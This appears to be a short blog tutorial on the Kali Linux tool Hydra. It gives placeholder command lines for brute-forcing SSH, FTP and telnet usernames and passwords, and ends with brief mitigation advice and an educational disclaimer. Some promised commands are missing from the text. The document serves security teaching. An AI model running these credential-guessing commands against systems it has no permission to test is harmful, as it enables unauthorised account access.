Examples of Kali Linux Hydra Tool
Hydra is a pre-installed tool in Kali Linux used to brute-force usernames and passwords to different services such as FTP, ssh, telnet, MS SQL, etc. Brute force can be used to try different usernames and passwords against a target to identify the correct credentials. Below is the list of all protocols supported by hydra.
Check the usage of Hydra by using of below command:
To brute-force ssh username and password
Create a username and password list to enumerate a target by using a hydra automation tool. You can access the wordlist in a directory by using the below command.
-l: input login
-L: list of username
-p: single password
-P: list of passwords
#hydra <Target_IP> ssh -l <username> -P <password_file> -s 22 -vV
#hydra <Target_IP> ssh -l <username> -p <password> -s 22 -vV
To brute-force FTP username and password
#hydra -L <username_file> -P <password_file> ftp://<Target_IP>
#hydra -l <username> -p <password> ftp://<Target_IP>
To brute-force telnet username and password
#hydra -l <username> -p <password> telnet://<Target_IP>
Mitigation to avoid brute-force attacks of username and password
Implementing account lockout, captcha implementation, complex password, two-factor authentication, hardware-based token authentication, etc. are some of the techniques for avoiding brute-force attacks on the target.
This article covers Examples of the Kali Linux Hydra Tool. At the end of the article, we discussed some mitigation techniques to avoid brute-force attacks.
Subscribe us to receive more such articles updates in your email.
If you have any questions, feel free to ask in the comments section below. Nothing gives me greater joy than helping my readers!
Disclaimer: This tutorial is for educational purpose only. Individual is solely responsible for any illegal act.